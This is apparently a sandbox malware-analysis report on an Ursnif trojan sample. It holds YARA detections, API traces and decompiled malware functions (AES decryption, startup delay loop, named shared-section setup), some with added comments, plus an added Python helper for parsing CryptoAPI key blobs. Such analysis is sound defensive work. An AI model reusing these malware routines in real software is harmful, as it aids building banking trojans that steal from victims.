                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000003.1072835287.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000003.1072860777.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000003.1072702315.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security

                                                          Disassembly

                                                          Code Analysis


                                                            Executed Functions

                                                            APIs
                                                            • RtlInitializeCriticalSection.NTDLL(0458C328), ref: 04567FFB
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • memset.NTDLL ref: 0456802C
                                                            • RtlInitializeCriticalSection.NTDLL(049BB148), ref: 0456803D
                                                              • Part of subcall function 0456D464: RtlInitializeCriticalSection.NTDLL(0458C300), ref: 0456D488
                                                              • Part of subcall function 0456D464: RtlInitializeCriticalSection.NTDLL(0458C2E0), ref: 0456D49E
                                                              • Part of subcall function 0456D464: GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04573914), ref: 0456D4AF
                                                              • Part of subcall function 0456D464: GetModuleHandleA.KERNEL32(0000170B), ref: 0456D4E3
                                                              • Part of subcall function 04583D51: RtlAllocateHeap.NTDLL(00000000,-00000003,77109EB0), ref: 04583D6B
                                                            • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000060), ref: 04568066
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04573914), ref: 04568077
                                                            • CloseHandle.KERNEL32(0000045C), ref: 0456808B
                                                            • GetUserNameA.ADVAPI32(00000000,?), ref: 045680D4
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 045680E7
                                                            • GetUserNameA.ADVAPI32(00000000,?), ref: 045680FC
                                                            • NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 0456812C
                                                            • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 04568141
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04573914), ref: 0456814B
                                                            • CloseHandle.KERNEL32(00000000), ref: 04568158
                                                            • GetShellWindow.USER32 ref: 04568173
                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 0456817A
                                                            • memcpy.NTDLL(0458C1E4,?,00000018), ref: 045681B6
                                                            • CreateEventA.KERNEL32(0458C1A8,00000001,00000000,00000000,?,00000001), ref: 04568239
                                                            • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 04568263
                                                            • OpenEventA.KERNEL32(00100000,00000000,049BA9E0), ref: 0456828B
                                                            • CreateEventA.KERNEL32(0458C1A8,00000001,00000000,049BA9E0), ref: 0456829E
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04573914), ref: 045682A4
                                                            • GetLastError.KERNEL32(04574A5B,0458C0FC,0458C100), ref: 0456832A
                                                            • LoadLibraryA.KERNEL32(?,04574A5B,0458C0FC,0458C100), ref: 04568345
                                                            • SetEvent.KERNEL32(?,0456D17E,00000000,00000000), ref: 045683DA
                                                            • RtlAllocateHeap.NTDLL(00000000,00000052,0456D17E), ref: 045683EF
                                                            • wsprintfA.USER32 ref: 0456841F
                                                              • Part of subcall function 0457DB4F: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00000000,045683BB,0456D17E,00000000,00000000), ref: 0457DBC5
                                                              • Part of subcall function 0458398C: HeapFree.KERNEL32(00000000,00000000,00000000,1D4E36C0,?,00000000,?,?,?,00000000,045683C0,0456D17E,00000000,00000000), ref: 045839FD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Allocate$CriticalErrorEventInitializeLastSection$CreateHandleProcess$CloseFreeNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemcpymemsetwsprintf
                                                            • String ID:
                                                            • API String ID: 2659885799-0
                                                            • Opcode ID: 8cd23f3b3fcca42f47c8d58e364050faf6c4e5b95acf05fa2f625d94510a17df
                                                            • Instruction ID: a6e30004766e61b23917b23ac55a2b3d6a50f728de08cb96ea99387eded0ffaf
                                                            • Opcode Fuzzy Hash: 8cd23f3b3fcca42f47c8d58e364050faf6c4e5b95acf05fa2f625d94510a17df
                                                            • Instruction Fuzzy Hash: 17C1BC70601305DFD721AF65E884A2A7BE8FB84755B00582EF546E3240DF79B848FF66
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 58%
                                                            			E00DD3FAB(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                            				int _v8;
                                                            				long* _v12;
                                                            				int _v16;
                                                            				BYTE* _v20;
                                                            				long* _v24;
                                                            				void* _v39;
                                                            				char _v40;
                                                            				void _v56;
                                                            				int _v60;
                                                            				intOrPtr _v64;
                                                            				void _v67;
                                                            				char _v68;
                                                            				void* _t61;
                                                            				int _t68;
                                                            				signed int _t76;
                                                            				int _t79;
                                                            				int _t81;
                                                            				int _t85;
                                                            				long _t86;
                                                            				int _t90;
                                                            				signed int _t94;
                                                            				int _t101;
                                                            				BYTE* _t102;
                                                            				int _t103;
                                                            				void* _t104;
                                                            				void* _t105;
                                                            				void* _t106;
                                                            
                                                            				_t103 = __eax;
                                                            				_t94 = 6;
                                                            				_v68 = 0;
                                                            				memset( &_v67, 0, _t94 << 2);
                                                            				_t105 = _t104 + 0xc;
                                                            				asm("stosw");
                                                            				asm("stosb");
                                                            				_v40 = 0;
                                                            				asm("stosd");
                                                            				asm("stosd");
                                                            				asm("stosd");
                                                            				asm("stosw");
                                                            				asm("stosb");
                                                            				_t61 =  *0xdda0dc( &_v24, 0, 0, 0x18, 0xf0000000); // executed
                                                            				if(_t61 == 0) {
                                                            					_a8 = GetLastError();
                                                            				} else {
                                                            					_t101 = 0x10;
                                                            					memcpy( &_v56, _a8, _t101);
                                                            					_t106 = _t105 + 0xc;
                                                            					_v60 = _t101;
                                                            					_v67 = 2;
                                                            					_v64 = 0x660e;
                                                            					_v68 = 8;
                                                            					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
                                                            					if(_t68 == 0) {
                                                            						_a8 = GetLastError();
                                                            					} else {
                                                            						_push(0);
                                                            						_push( &_v40);
                                                            						_push(1);
                                                            						_push(_v12);
                                                            						if( *0xdda0b8() == 0) {
                                                            							_a8 = GetLastError();
                                                            						} else {
                                                            							_t18 = _t103 + 0xf; // 0x10
                                                            							_t76 = _t18 & 0xfffffff0;
                                                            							if(_a4 != 0 && _t76 == _t103) {
                                                            								_t76 = _t76 + _t101;
                                                            							}
                                                            							_t102 = E00DD77D7(_t76);
                                                            							_v20 = _t102;
                                                            							if(_t102 == 0) {
                                                            								_a8 = 8;
                                                            							} else {
                                                            								_v16 = 0;
                                                            								_a8 = 0;
                                                            								while(1) {
                                                            									_t79 = 0x10;
                                                            									_v8 = _t79;
                                                            									if(_t103 <= _t79) {
                                                            										_v8 = _t103;
                                                            									}
                                                            									memcpy(_t102, _a12, _v8);
                                                            									_t81 = _v8;
                                                            									_a12 = _a12 + _t81;
                                                            									_t103 = _t103 - _t81;
                                                            									_t106 = _t106 + 0xc;
                                                            									if(_a4 == 0) {
                                                            										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
                                                            									} else {
                                                            										_t85 =  *0xdda0d4(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
                                                            									}
                                                            									if(_t85 == 0) {
                                                            										break;
                                                            									}
                                                            									_t90 = _v8;
                                                            									_v16 = _v16 + _t90;
                                                            									_t102 =  &(_t102[_t90]);
                                                            									if(_t103 != 0) {
                                                            										continue;
                                                            									} else {
                                                            										L17:
                                                            										 *_a16 = _v20;
                                                            										 *_a20 = _v16;
                                                            									}
                                                            									goto L21;
                                                            								}
                                                            								_t86 = GetLastError();
                                                            								_a8 = _t86;
                                                            								if(_t86 != 0) {
                                                            									E00DD77EC(_v20);
                                                            								} else {
                                                            									goto L17;
                                                            								}
                                                            							}
                                                            						}
                                                            						L21:
                                                            						CryptDestroyKey(_v12);
                                                            					}
                                                            					CryptReleaseContext(_v24, 0);
                                                            				}
                                                            				return _a8;
                                                            			}
                                                            0x00dd3fb4
                                                            0x00dd3fba
                                                            0x00dd3fbd
                                                            0x00dd3fc3
                                                            0x00dd3fc3
                                                            0x00dd3fc5
                                                            0x00dd3fc7
                                                            0x00dd3fca
                                                            0x00dd3fd0
                                                            0x00dd3fd1
                                                            0x00dd3fd2
                                                            0x00dd3fd8
                                                            0x00dd3fdd
                                                            0x00dd3fe3
                                                            0x00dd3feb
                                                            0x00dd4148
                                                            0x00dd3ff1
                                                            0x00dd3ff3
                                                            0x00dd3ffc
                                                            0x00dd4001
                                                            0x00dd4013
                                                            0x00dd4016
                                                            0x00dd401a
                                                            0x00dd4021
                                                            0x00dd4025
                                                            0x00dd402d
                                                            0x00dd4133
                                                            0x00dd4033
                                                            0x00dd4033
                                                            0x00dd4037
                                                            0x00dd4038
                                                            0x00dd403a
                                                            0x00dd4045
                                                            0x00dd411f
                                                            0x00dd404b
                                                            0x00dd404b
                                                            0x00dd404e
                                                            0x00dd4054
                                                            0x00dd405a
                                                            0x00dd405a
                                                            0x00dd4062
                                                            0x00dd4066
                                                            0x00dd4069
                                                            0x00dd4110
                                                            0x00dd406f
                                                            0x00dd4075
                                                            0x00dd4078
                                                            0x00dd407b
                                                            0x00dd407d
                                                            0x00dd4080
                                                            0x00dd4083
                                                            0x00dd4085
                                                            0x00dd4085
                                                            0x00dd408f
                                                            0x00dd4094
                                                            0x00dd4097
                                                            0x00dd409a
                                                            0x00dd409c
                                                            0x00dd40a5
                                                            0x00dd40cf
                                                            0x00dd40a7
                                                            0x00dd40b8
                                                            0x00dd40b8
                                                            0x00dd40d7
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd40d9
                                                            0x00dd40dc
                                                            0x00dd40df
                                                            0x00dd40e3
                                                            0x00000000
                                                            0x00dd40e5
                                                            0x00dd40f4
                                                            0x00dd40fa
                                                            0x00dd4102
                                                            0x00dd4102
                                                            0x00000000
                                                            0x00dd40e3
                                                            0x00dd40e7
                                                            0x00dd40ef
                                                            0x00dd40f2
                                                            0x00dd4109
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd40f2
                                                            0x00dd4069
                                                            0x00dd4122
                                                            0x00dd4125
                                                            0x00dd4125
                                                            0x00dd413a
                                                            0x00dd413a
                                                            0x00dd4152

                                                            APIs
                                                            • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,00DD48AF,00000001,00DD72E3,00000000), ref: 00DD3FE3
                                                            • memcpy.NTDLL(00DD48AF,00DD72E3,00000010,?,?,?,00DD48AF,00000001,00DD72E3,00000000,?,00DD63E1,00000000,00DD72E3,?,00000000), ref: 00DD3FFC
                                                            • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 00DD4025
                                                            • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 00DD403D
                                                            • memcpy.NTDLL(00000000,00000000,039C9630,00000010), ref: 00DD408F
                                                            • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,039C9630,00000020,?,?,00000010), ref: 00DD40B8
                                                            • CryptDecrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,039C9630,?,?,00000010), ref: 00DD40CF
                                                            • GetLastError.KERNEL32(?,?,00000010), ref: 00DD40E7
                                                            • GetLastError.KERNEL32 ref: 00DD4119
                                                            • CryptDestroyKey.ADVAPI32(00000000), ref: 00DD4125
                                                            • GetLastError.KERNEL32 ref: 00DD412D
                                                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00DD413A
                                                            • GetLastError.KERNEL32(?,?,?,00DD48AF,00000001,00DD72E3,00000000,?,00DD63E1,00000000,00DD72E3,?,00000000,00DD72E3,00000000,039C9630), ref: 00DD4142
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
                                                            • String ID:
                                                            • API String ID: 1967744295-0
                                                            • Opcode ID: c3711c63ae216681105edf1eab16d9b3090d08571ce97db36212a133f81a38a2
                                                            • Instruction ID: 1e37fc809bff89b858f3ca5370a58e57faa30ae0635f3008a2f5f6cf7bc80eed
                                                            • Opcode Fuzzy Hash: c3711c63ae216681105edf1eab16d9b3090d08571ce97db36212a133f81a38a2
                                                            • Instruction Fuzzy Hash: CD5149B1900208FFDF10DFA9DC89AAEBBB9EB04350F14842AF915E6250E7719E54DB71
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
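
The call sequence in the API list above is the CryptoAPI idiom for importing a raw AES key and setting an IV: CryptAcquireContextW with provider type 0x18 (PROV_RSA_AES) and flags 0xF0000000 (CRYPT_VERIFYCONTEXT), a 0x10-byte memcpy of key material into a blob, CryptImportKey with dwDataLen 0x1C, then CryptSetKeyParam with dwParam 1 (KP_IV), after which CryptEncrypt/CryptDecrypt run in the provider's default block mode, CBC. The 0x1C is the tell: a PLAINTEXTKEYBLOB is an 8-byte BLOBHEADER, a 4-byte key length and the key, so 0x1C leaves 16 key bytes, i.e. AES-128. The following added Python example (not code from the report or from the sample) builds and parses such blobs so that a key blob carved from a memory dump can be decoded and checked for consistency; the sample key bytes are constructed for illustration and the function names are this example's own.

```python
import struct

# BLOBHEADER / PLAINTEXTKEYBLOB constants from wincrypt.h
PLAINTEXTKEYBLOB = 0x08
CUR_BLOB_VERSION = 0x02
CALG_AES_128 = 0x660E
CALG_AES_192 = 0x660F
CALG_AES_256 = 0x6610

# bType, bVersion, reserved, aiKeyAlg, then the PLAINTEXTKEYBLOB dwKeySize field
_BLOBHEADER_FMT = "<BBHII"
_BLOBHEADER_LEN = struct.calcsize(_BLOBHEADER_FMT)  # 12 bytes before the key
_ALG_BY_KEYLEN = {16: CALG_AES_128, 24: CALG_AES_192, 32: CALG_AES_256}
_NAME_BY_ALG = {CALG_AES_128: "AES-128", CALG_AES_192: "AES-192", CALG_AES_256: "AES-256"}


def build_plaintext_key_blob(key: bytes) -> bytes:
    """Build the PLAINTEXTKEYBLOB that CryptImportKey expects for a raw AES key."""
    if len(key) not in _ALG_BY_KEYLEN:
        raise ValueError(f"unsupported AES key length {len(key)}")
    header = struct.pack(_BLOBHEADER_FMT, PLAINTEXTKEYBLOB, CUR_BLOB_VERSION,
                         0, _ALG_BY_KEYLEN[len(key)], len(key))
    return header + key


def parse_plaintext_key_blob(blob: bytes) -> dict:
    """Decode a PLAINTEXTKEYBLOB (for example one carved from a dump).

    Every header field is cross-checked so that a truncated or mis-aligned
    carve is rejected instead of yielding a plausible-looking wrong key.
    """
    if len(blob) < _BLOBHEADER_LEN:
        raise ValueError("blob shorter than BLOBHEADER + dwKeySize")
    btype, bversion, reserved, alg, keylen = struct.unpack_from(_BLOBHEADER_FMT, blob, 0)
    if btype != PLAINTEXTKEYBLOB or bversion != CUR_BLOB_VERSION or reserved != 0:
        raise ValueError("not a PLAINTEXTKEYBLOB header")
    if alg not in _NAME_BY_ALG:
        raise ValueError(f"unexpected aiKeyAlg 0x{alg:04x}")
    if _ALG_BY_KEYLEN.get(keylen) != alg:
        raise ValueError(f"dwKeySize {keylen} does not match aiKeyAlg 0x{alg:04x}")
    if len(blob) != _BLOBHEADER_LEN + keylen:
        raise ValueError(f"expected {_BLOBHEADER_LEN + keylen} bytes, got {len(blob)}")
    return {"alg": alg, "name": _NAME_BY_ALG[alg], "key": blob[_BLOBHEADER_LEN:]}


def aes_variant_from_import_len(dw_data_len: int) -> str:
    """Infer the AES variant from the dwDataLen passed to CryptImportKey alone."""
    keylen = dw_data_len - _BLOBHEADER_LEN
    if keylen not in _ALG_BY_KEYLEN:
        raise ValueError(f"0x{dw_data_len:x} is not a PLAINTEXTKEYBLOB length for AES")
    return _NAME_BY_ALG[_ALG_BY_KEYLEN[keylen]]


if __name__ == "__main__":
    # Constructed sample key for illustration only; not key material from the sample.
    sample_key = bytes(range(0x10))
    blob = build_plaintext_key_blob(sample_key)
    print(hex(len(blob)), aes_variant_from_import_len(len(blob)))  # 0x1c AES-128
    print(parse_plaintext_key_blob(blob))
```

When a blob with this header is found in the dumped heap, the 16 bytes after offset 12 are the AES key, and the 0x10 bytes passed through CryptSetKeyParam(KP_IV) immediately afterwards are the IV; together they are enough to replay the CryptDecrypt call offline.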

                                                            C-Code - Quality: 82%
E6E4B1A1C(intOrPtr _a4) {
	void _v316;
	signed int _v332;
	long _v344;
	long _v348;
	char _v356;
	char _v360;
	long _v364;
	long _v368;
	void* __edi;
	long _t25;
	long _t28;
	long _t31;
	long _t32;
	long _t36;
	void* _t42;
	intOrPtr _t44;
	intOrPtr _t49;
	long _t50;
	void* _t56;
	signed int _t59;
	signed int _t60;
	void* _t62;
	intOrPtr* _t63;

	// Subcall E6E4B1C6F creates an event, reads the OS version and opens the current
	// process (see the API list below); a non-zero result aborts initialisation.
	_t25 = E6E4B1C6F(); // 0x6e4b1a2b
	_v348 = _t25; // 0x6e4b1a34
	if(_t25 != 0) { // 0x6e4b1a38
		L18: // 0x6e4b1b4c
		return _t25; // 0x6e4b1b52
	} else {
		goto L1;
	}
	do { // 0x6e4b1a3e
		L1: // 0x6e4b1a3e
		_v344 = 0; // 0x6e4b1a4f
		// Class 8 = SystemProcessorPerformanceInformation (per-CPU idle/kernel/user
		// time counters); 0x138 bytes are requested into the stack buffer.
		_t28 = NtQuerySystemInformation(8,  &_v316, 0x138,  &_v344); // executed, 0x6e4b1a53
		_t50 = _t28; // 0x6e4b1a59
		_t59 = 0x13; // 0x6e4b1a61
		_t11 = _t50 + 1; // 0x1, 0x6e4b1a66
		// Delay factor: a stack word (_v332, which the decompiler places just below
		// the buffer) reduced modulo 0x13, plus (status + 1).
		_t60 = _v332 % _t59 + _t11; // 0x6e4b1a66
		// E6E4B18A0 allocates with VirtualAlloc, memcpy's into the new region and
		// frees it again (see API list); the loop repeats while it returns 9.
		_t31 = E6E4B18A0(0, _t60); // executed, 0x6e4b1a6b
		_v368 = _t31; // 0x6e4b1a74
		Sleep(_t60 << 4); // executed, 0x6e4b1a78: sleeps _t60 * 16 ms between attempts
		_t25 = _v368; // 0x6e4b1a7e
	} while (_t25 == 9); // 0x6e4b1a82
	if(_t25 != 0) { // 0x6e4b1a89
		goto L18;
	}
	_t32 = E6E4B1741(_t50); // executed, 0x6e4b1a8f
	_v364 = _t32; // 0x6e4b1a96
	if(_t32 != 0) { // 0x6e4b1a9a
		L16: // 0x6e4b1b3d
		_t25 = _v364; // 0x6e4b1b3d
		// -1 from the thread path below means "look at GetLastError".
		if(_t25 == 0xffffffff) { // 0x6e4b1b44
			_t25 = GetLastError(); // 0x6e4b1b46
		} // 0x6e4b1b46
		goto L18;
	} // 0x6e4b1b44
	// A non-zero _a4 skips the path lookup and starts the worker thread directly.
	if(_a4 != 0) { // 0x6e4b1aa3
		L11: // 0x6e4b1af6
		_push(0); // 0x6e4b1af6
		// E6E4B1000 is a thread-creation wrapper with E6E4B1CDB as the thread routine
		// (inferred from the wait / exit-code / close sequence applied to its result).
		_t62 = E6E4B1000(E6E4B1CDB,  &_v356); // 0x6e4b1b07
		if(_t62 == 0) { // 0x6e4b1b0b
			_v368 = GetLastError(); // 0x6e4b1b39
		} else { // 0x6e4b1b0d
			// Blocks until the worker thread finishes and returns its exit code.
			_t36 = WaitForSingleObject(_t62, 0xffffffff); // 0x6e4b1b10
			_v368 = _t36; // 0x6e4b1b18
			if(_t36 == 0) { // 0x6e4b1b1c
				GetExitCodeThread(_t62,  &_v368); // executed, 0x6e4b1b24
			} // 0x6e4b1b24
			CloseHandle(_t62); // 0x6e4b1b2b
		} // 0x6e4b1b2b
		goto L16;
	} // 0x6e4b1b0b
	// E6E4B1468 fills _v360 with a path string (it is handed to GetLongPathNameW
	// below); on failure the global at 0x6e4b41b8 is cleared and the thread still runs.
	if(E6E4B1468(_t50,  &_v360) != 0) { // 0x6e4b1ab1
		 *0x6e4b41b8 = 0; // 0x6e4b1af0
		goto L11;
	} // 0x6e4b1af0
	_t49 = _v360; // 0x6e4b1ab3
	_t63 = __imp__GetLongPathNameW; // 0x6e4b1ab7
	// First call with a NULL buffer returns the required length in characters.
	_t42 =  *_t63(_t49, 0, 0); // executed, 0x6e4b1ac0
	_t56 = _t42; // 0x6e4b1ac2
	if(_t56 == 0) { // 0x6e4b1ac6
		L9: // 0x6e4b1ae8
		// Fallback: keep the unexpanded path in the global.
		 *0x6e4b41b8 = _t49; // 0x6e4b1ae8
		goto L11;
	} // 0x6e4b1ae8
	// Allocate (len + 1) * 2 bytes for the wide string; E6E4B2102 / E6E4B2117 look
	// like the allocator / free pair (inferred from their use here).
	_t19 = _t56 + 2; // 0x2, 0x6e4b1ac8
	_t44 = E6E4B2102(_t56 + _t19); // 0x6e4b1acd
	 *0x6e4b41b8 = _t44; // 0x6e4b1ad4
	if(_t44 == 0) { // 0x6e4b1ad9
		goto L9;
	} else { // 0x6e4b1adb
		// Second call fills the new buffer with the long path; the old string is freed.
		 *_t63(_t49, _t44, _t56); // executed, 0x6e4b1ade
		E6E4B2117(_t49); // 0x6e4b1ae1
		goto L11;
	} // 0x6e4b1ae1
}

                                                            APIs
                                                              • Part of subcall function 6E4B1C6F: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E4B1A30,73B763F0,00000000), ref: 6E4B1C7E
                                                              • Part of subcall function 6E4B1C6F: GetVersion.KERNEL32 ref: 6E4B1C8D
                                                              • Part of subcall function 6E4B1C6F: GetCurrentProcessId.KERNEL32 ref: 6E4B1C9C
                                                              • Part of subcall function 6E4B1C6F: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E4B1CB5
                                                            • NtQuerySystemInformation.NTDLL(00000008,?,00000138,?), ref: 6E4B1A53
                                                              • Part of subcall function 6E4B18A0: VirtualAlloc.KERNELBASE(00000000,6E4B1A70,00003000,00000004,?,?,6E4B1A70,00000001), ref: 6E4B18F6
                                                              • Part of subcall function 6E4B18A0: memcpy.NTDLL(?,?,6E4B1A70,?,?,6E4B1A70,00000001), ref: 6E4B1991
                                                              • Part of subcall function 6E4B18A0: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,6E4B1A70,00000001), ref: 6E4B19AC
                                                            • Sleep.KERNELBASE(00000001,00000001), ref: 6E4B1A78
                                                            • GetLongPathNameW.KERNELBASE ref: 6E4B1AC0
                                                            • GetLongPathNameW.KERNELBASE ref: 6E4B1ADE
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,6E4B1CDB,?,00000000), ref: 6E4B1B10
                                                            • GetExitCodeThread.KERNELBASE(00000000,?), ref: 6E4B1B24
                                                            • CloseHandle.KERNEL32(00000000), ref: 6E4B1B2B
                                                            • GetLastError.KERNEL32(6E4B1CDB,?,00000000), ref: 6E4B1B33
                                                            • GetLastError.KERNEL32 ref: 6E4B1B46
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1185181412.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
                                                            • Associated: 00000000.00000002.1185112968.000000006E4B0000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185264812.000000006E4B3000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185310564.000000006E4B5000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185336391.000000006E4B6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: ErrorLastLongNamePathProcessVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleInformationObjectOpenQuerySingleSleepSystemThreadVersionWaitmemcpy
                                                            • String ID:
                                                            • API String ID: 2016936029-0
                                                            • Opcode ID: d990133f7f08e286c5f58534f7112542ce46550c34a06d567992d81b3792b7fb
                                                            • Instruction ID: d45a9bf59d97b1126262781c4fc7447803b52ab00da9aa6c2254ee46e4e94093
                                                            • Opcode Fuzzy Hash: d990133f7f08e286c5f58534f7112542ce46550c34a06d567992d81b3792b7fb
                                                            • Instruction Fuzzy Hash: F531A371908711ABC740EFB99888E5BB7ECAF89750F10091BF554C3344E770E50987B2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 69%
E6E4B109B(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
	intOrPtr _v12;
	struct _FILETIME* _v16;
	short _v60;
	struct _FILETIME* _t14;
	intOrPtr _t15;
	long _t18;
	void* _t19;
	void* _t22;
	intOrPtr _t31;
	long _t32;
	void* _t34;

	_t31 = __edx; // 0x6e4b109b
	_t14 =  &_v16; // 0x6e4b10a4
	// Current time as a 64-bit FILETIME (100 ns units since 1601) in _v16/_v12.
	GetSystemTimeAsFileTime(_t14); // 0x6e4b10a8
	// Divisor 0x0000019254D38000 (high dword 0x192, low dword 0x54d38000)
	// = 1,728,000,000,000 * 100 ns = 172,800 s = exactly 48 hours.
	_push(0x192); // 0x6e4b10ae
	_push(0x54d38000); // 0x6e4b10b3
	_push(_v12); // 0x6e4b10b8
	_push(_v16); // 0x6e4b10bb
	L6E4B2220(); // _aulldiv thunk, 0x6e4b10be: quotient = FILETIME / 48 h in edx:eax
	_push(_t14); // 0x6e4b10c3
	_v16 = _t14; // 0x6e4b10c4
	// *0x6e4b41d0 is a relocation delta applied to the two string addresses below.
	_t15 =  *0x6e4b41d0; // 0x6e4b10c7
	_push(_t15 + 0x6e4b505e); // 0x6e4b10d2: second string argument (not in the dump)
	_push(_t15 + 0x6e4b5054); // 0x6e4b10d9: format string (not in the dump)
	_push(0x16); // 0x6e4b10dd: buffer size, 22 wide characters
	_push( &_v60); // 0x6e4b10df
	_v12 = _t31; // 0x6e4b10e0
	L6E4B221A(); // _snwprintf thunk, 0x6e4b10e3: formats the section name into _v60
	_t18 = _a4; // 0x6e4b10e8
	if(_t18 == 0) { // 0x6e4b10f2
		// Size 0 means "attach to an existing section", see the 0xb7 check below.
		_t18 = 0x1000; // 0x6e4b10f4
	} // 0x6e4b10f4
	// Pagefile-backed named section: INVALID_HANDLE_VALUE, SECURITY_ATTRIBUTES at
	// 0x6e4b41c0, PAGE_READWRITE (4), size _t18, name from _v60.
	_t19 = CreateFileMappingW(0xffffffff, 0x6e4b41c0, 4, 0, _t18,  &_v60); // executed, 0x6e4b1108
	_t34 = _t19; // 0x6e4b110e
	if(_t34 == 0) { // 0x6e4b1112
		_t32 = GetLastError(); // 0x6e4b1162
	} else { // 0x6e4b1114
		// With _a4 == 0 the section must already exist (0xb7 = ERROR_ALREADY_EXISTS);
		// a freshly created one is closed again and 2 (ERROR_FILE_NOT_FOUND) returned.
		if(_a4 != 0 || GetLastError() == 0xb7) { // 0x6e4b111d
			// 6 = FILE_MAP_READ | FILE_MAP_WRITE, whole section.
			_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed, 0x6e4b1133
			if(_t22 == 0) { // 0x6e4b113b
				_t32 = GetLastError(); // 0x6e4b114d
				// As decompiled: if GetLastError() is 0 here the handle is not closed
				// and 0 is returned without filling the out-parameters.
				if(_t32 != 0) { // 0x6e4b1151
					goto L9;
				}
			} else { // 0x6e4b113d
				 *_a8 = _t34; // 0x6e4b1140: section handle out
				 *_a12 = _t22; // 0x6e4b1145: view base out
				_t32 = 0; // 0x6e4b1147
			} // 0x6e4b1147
		} else { // 0x6e4b1128
			_t32 = 2; // 0x6e4b112a
			L9: // 0x6e4b1153
			CloseHandle(_t34); // 0x6e4b1154
		} // 0x6e4b1154
	} // 0x6e4b111d
	return _t32; // 0x6e4b116a: 0 on success, otherwise a Win32 error code
}

                                                            APIs
                                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 6E4B10A8
                                                            • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E4B10BE
                                                            • _snwprintf.NTDLL ref: 6E4B10E3
                                                            • CreateFileMappingW.KERNELBASE(000000FF,6E4B41C0,00000004,00000000,?,?), ref: 6E4B1108
                                                            • GetLastError.KERNEL32 ref: 6E4B111F
                                                            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6E4B1133
                                                            • GetLastError.KERNEL32 ref: 6E4B114B
                                                            • CloseHandle.KERNEL32(00000000), ref: 6E4B1154
                                                            • GetLastError.KERNEL32 ref: 6E4B115C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1185181412.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
                                                            • Associated: 00000000.00000002.1185112968.000000006E4B0000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185264812.000000006E4B3000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185310564.000000006E4B5000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185336391.000000006E4B6000.00000002.00020000.sdmp
                                                            Similarity
